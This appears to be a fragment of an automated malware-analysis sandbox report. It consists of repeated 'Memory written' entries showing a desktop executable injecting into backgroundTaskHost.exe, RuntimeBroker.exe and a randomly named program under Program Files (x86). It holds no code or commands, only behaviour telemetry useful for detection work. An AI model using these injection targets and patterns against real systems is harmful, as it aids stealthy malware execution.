        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 6B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2ED0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2410000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 27F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2940000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2350000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 26A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2790000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2550000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 25A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 30D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1270000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 20D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2720000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2770000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 570000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 580000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2840000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2990000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 26B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2DF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 29B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2BD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1480000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 3230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2E50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2540000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2690000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2910000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 21E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: ED0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B00000Jump to behavior
